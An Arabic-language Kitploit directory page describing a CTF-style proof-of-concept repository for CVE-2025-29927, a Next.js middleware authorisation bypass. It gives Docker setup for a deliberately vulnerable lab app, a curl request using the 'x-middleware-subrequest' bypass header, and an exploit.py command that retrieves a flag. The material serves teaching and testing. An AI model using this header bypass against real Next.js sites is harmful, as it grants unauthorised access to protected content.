Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-29927 — إثبات مفهوم بأسلوب CTF يوضح تجاوز تفويض الوسيطة في Next.js الخاص بـ CVE-2025-29927. يتضمن تطبيق Docker ضعيف وسكريبت استغلال لاسترداد العلم (flag) من المسار المحمي. | Kitploit
أدوات/GitHubGitHub/mhamzakhattak/cve-2025-29927
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالتعلم والتعليم
GitHubmhamzakhattak/cve-2025-29927

CVE-2025-29927

إثبات مفهوم بأسلوب CTF يوضح تجاوز تفويض الوسيطة في Next.js الخاص بـ CVE-2025-29927. يتضمن تطبيق Docker ضعيف وسكريبت استغلال لاسترداد العلم (flag) من المسار المحمي.

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-29927 - تجاوز صلاحية الوسيطة (Middleware) في Next.js (إثبات المفهوم)

هذا إثبات مفهوم بأسلوب مسابقة التقاط العلم (CTF) للثغرة تجاوز صلاحية الوسيطة في Next.js (CVE-2025-29927). الهدف هو تجاوز صلاحية الوسيطة (auth middleware) واسترجاع العلم من المسار /protected.


ملخص الثغرة

  • CVE: CVE-2025-29927
  • النوع: تجاوز الصلاحية
  • المكون: وسيطة Next.js
  • التأثير: الوصول غير المصرح به إلى المسارات المحمية
  • المسار المستهدف في إثبات المفهوم: /protected
  • السلوك المتوقع: يتم إعادة توجيه المستخدمين غير المصرح لهم إلى /
  • السلوك القابل للاستغلال: استخدام طلب مخصص يسمح بتجاوز إعادة التوجيه والوصول المباشر إلى المحتوى المحمي

إعداد إثبات المفهوم

1. استنساخ المستودع

root@kitploit:~
git clone https://github.com/mhamzakhattak/CVE-2025-29927
cd CVE-2025-29927
cd nextjs-docker

2. بناء وتشغيل التطبيق القابل للاستغلال

root@kitploit:~
sudo docker build -t nextjs-auth-app .
sudo docker run -p 3000:3000 nextjs-auth-app

سيبدأ تشغيل تطبيق Next.js القابل للاستغلال على http://IP:3000


الاستغلال

1. بدون استغلال

حاول الوصول إلى:

root@kitploit:~
curl -i http://IP:3000/protected

سيتم إعادة توجيهك إلى /.

root@kitploit:~
 curl -H "x-middleware-subrequest: middleware" http://IP:3000/protected

2. باستخدام الاستغلال

استخدم exploit.py المقدم لتجاوز الوسيطة والوصول إلى المسار المحمي:

root@kitploit:~
python3 exploit.py -url http://IP:3000

في حالة النجاح، ستقوم باسترجاع العلم من /protected.


الملفات

  • Dockerfile - بناء تطبيق Next.js القابل للاستغلال
  • exploit.py - يستغل الثغرة لتجاوز الصلاحية
  • pages/ - يحتوي على المسارات القابلة للاستغلال /protected و /login
  • middleware.js - منطق الوسيطة القابل للاستغلال
  • README.md - هذا الملف

إخلاء مسؤولية

إثبات المفهوم هذا هو لأغراض تعليمية وبحثية فقط. لا تستخدمه ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.


🏁 العلم

ابحث عن العلم عن طريق استغلال الثغرة والوصول إلى:

root@kitploit:~
http://IP:3000/protected

حظ موفق! 🏴‍☠️

تنزيل الأداة